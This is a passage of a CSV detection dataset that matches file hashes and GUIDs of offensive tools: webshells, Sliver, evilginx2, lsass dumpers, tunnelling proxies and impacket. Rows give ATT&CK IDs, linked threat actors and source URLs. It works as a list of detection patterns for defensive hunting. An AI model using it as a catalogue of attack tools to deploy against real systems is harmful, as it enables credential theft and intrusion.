T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27367" "*5bb980340a76e2f2ee12af9345d5662a84cc013346746c6fb6c8271e201ac9d2*",".{0,1000}5bb980340a76e2f2ee12af9345d5662a84cc013346746c6fb6c8271e201ac9d2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27368" "*5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14*",".{0,1000}5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27369" "*5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181*",".{0,1000}5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27370" "*5bd91a94ce7fab7461d6d88c603d94501bf3f7c8865a3a5045d8caa39d82ebe2*",".{0,1000}5bd91a94ce7fab7461d6d88c603d94501bf3f7c8865a3a5045d8caa39d82ebe2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27375" "*5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd*",".{0,1000}5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27378" "*5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd*",".{0,1000}5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery 
tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27379" "*5be6fef49d21ddd81cfd1a8076c04385568d5120f20e0451bf4aaab0796e1656*",".{0,1000}5be6fef49d21ddd81cfd1a8076c04385568d5120f20e0451bf4aaab0796e1656.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27380" "*5be7ac60cb04f99ae1e563f21289ae608b3dfdd2e79becbeef1a611e9a7bf186*",".{0,1000}5be7ac60cb04f99ae1e563f21289ae608b3dfdd2e79becbeef1a611e9a7bf186.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27381" "*5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890*",".{0,1000}5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","27386" "*5c0e2b1e7facf950cf245eca4c1c5533d9d7bfbeb804d1aa18f304fe1fcf5aed*",".{0,1000}5c0e2b1e7facf950cf245eca4c1c5533d9d7bfbeb804d1aa18f304fe1fcf5aed.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27390" "*5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501*",".{0,1000}5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","27392" "*5c19bc2cac0c45c991371aa4395e31e8ac7104d807cf8d1c2c3ff1f8b5e535f7*",".{0,1000}5c19bc2cac0c45c991371aa4395e31e8ac7104d807cf8d1c2c3ff1f8b5e535f7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27393" "*5c1ced06b49c8595e1191004994c0b82de8eef82559776faa1dba19240c76dc0*",".{0,1000}5c1ced06b49c8595e1191004994c0b82de8eef82559776faa1dba19240c76dc0.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27394" 
"*5c257d91b3148cd1c64613a7e1fb1902ba092a964777f6ea4aac6884b6c2f542*",".{0,1000}5c257d91b3148cd1c64613a7e1fb1902ba092a964777f6ea4aac6884b6c2f542.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27397" "*5c2a6754f5b9e92a49dfb22ce0644d0e4afaecc5b7a8d7e4714dfb578917c7d8*",".{0,1000}5c2a6754f5b9e92a49dfb22ce0644d0e4afaecc5b7a8d7e4714dfb578917c7d8.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","27398" "*5c35b47cb32378235e9df3c1d9a07700d4c49011532781cda0c0a8fafb4927ec*",".{0,1000}5c35b47cb32378235e9df3c1d9a07700d4c49011532781cda0c0a8fafb4927ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27401" "*5c3a2b52076490d4dbcff0a880931e52fe492e253e003961bae52c99e23d25b0*",".{0,1000}5c3a2b52076490d4dbcff0a880931e52fe492e253e003961bae52c99e23d25b0.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","27402" 
"*5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3*",".{0,1000}5C3AD9AC\-C62C\-4AA8\-BAE2\-9AF920A652E3.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#GUIDproject","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","27403" "*5c426f2a95c86e28b4d2944fce78541c0956fe45eb0b1b728aefe976773b4431*",".{0,1000}5c426f2a95c86e28b4d2944fce78541c0956fe45eb0b1b728aefe976773b4431.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27406" "*5c4edaafc9e7a3e8aa07634eeb901be2b64b899a9fa018b5ceb4cb800f750d9f*",".{0,1000}5c4edaafc9e7a3e8aa07634eeb901be2b64b899a9fa018b5ceb4cb800f750d9f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27410" "*5c560a9be9b74ebc5a006a808c82813eeb5c7d7dcff5d1c34be4fb1fba562535*",".{0,1000}5c560a9be9b74ebc5a006a808c82813eeb5c7d7dcff5d1c34be4fb1fba562535.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27411" "*5c575e2b8caaac3ca42bbe9f7332d822d972ff09afb6afdea8561e929c35d922*",".{0,1000}5c575e2b8caaac3ca42bbe9f7332d822d972ff09afb6afdea8561e929c35d922.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27412" "*5c59a42bf1ad7c424f6c337cc11e40ed0d8d365c57378df1e5f5613223e4c1ea*",".{0,1000}5c59a42bf1ad7c424f6c337cc11e40ed0d8d365c57378df1e5f5613223e4c1ea.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27414" "*5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12*",".{0,1000}5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27415" "*5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d*",".{0,1000}5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","27416" "*5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe*",".{0,1000}5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#filehash","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","27418" "*5c66b553237114b4d5f347969bc2321bdf916fda972e947dd7590640bc9f4ed5*",".{0,1000}5c66b553237114b4d5f347969bc2321bdf916fda972e947dd7590640bc9f4ed5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27419" "*5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf*",".{0,1000}5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27422" "*5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5*",".{0,1000}5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27423" "*5c7e09b63bd99851d8b93241f3907917c07af3903aa024da0bd549ae1fc373f7*",".{0,1000}5c7e09b63bd99851d8b93241f3907917c07af3903aa024da0bd549ae1fc373f7.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","27424" "*5c83e3984dc59f7fee94752fee3f1418b991f6929a21eb534e01c5264b517f41*",".{0,1000}5c83e3984dc59f7fee94752fee3f1418b991f6929a21eb534e01c5264b517f41.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27426" "*5c85b965c19ff7f7742980f90965279aa0ae2ea4c50317ad7680b56d6e3ed9d5*",".{0,1000}5c85b965c19ff7f7742980f90965279aa0ae2ea4c50317ad7680b56d6e3ed9d5.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a 
user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","27427" "*5C87B2E6-8D24-4F1D-AB85-FC659F452AD0*",".{0,1000}5C87B2E6\-8D24\-4F1D\-AB85\-FC659F452AD0.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","27428" "*5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472*",".{0,1000}5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27430" "*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27431" "*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27432" "*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27433" "*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27434" "*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27435" "*5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d*",".{0,1000}5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27436" "*5c9ce953e49bb74ead6c093ada4159c244082732eb00e00dd526e2edb0c820d4*",".{0,1000}5c9ce953e49bb74ead6c093ada4159c244082732eb00e00dd526e2edb0c820d4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27437" "*5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422*",".{0,1000}5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27438" 
"*5cac558b724fafdcac0b946daabc39ca78154142a408b62fb59db5655f07e139*",".{0,1000}5cac558b724fafdcac0b946daabc39ca78154142a408b62fb59db5655f07e139.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27440" "*5cadf4e7a35d191850cb6587b934ab191b781c9465d39bed7b0ae46f173ed43d*",".{0,1000}5cadf4e7a35d191850cb6587b934ab191b781c9465d39bed7b0ae46f173ed43d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27441" "*5cb5931045705f9c78923247204bbca0f6b7bc4825af11bb053b7e4297e23f8d*",".{0,1000}5cb5931045705f9c78923247204bbca0f6b7bc4825af11bb053b7e4297e23f8d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27442" "*5cbfbb972be8b3611722c133a87a7771f871f5cd6f10f1d2cf3043a2c3c11cd3*",".{0,1000}5cbfbb972be8b3611722c133a87a7771f871f5cd6f10f1d2cf3043a2c3c11cd3.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one'
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","27443" "*5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7*",".{0,1000}5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","27444" "*5ccf7538e23279696252e4ff25a453d2e3693c76d5c2ffce705e8b9b8c1fe1b5*",".{0,1000}5ccf7538e23279696252e4ff25a453d2e3693c76d5c2ffce705e8b9b8c1fe1b5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27445" "*5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6*",".{0,1000}5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27446" "*5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1*",".{0,1000}5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral 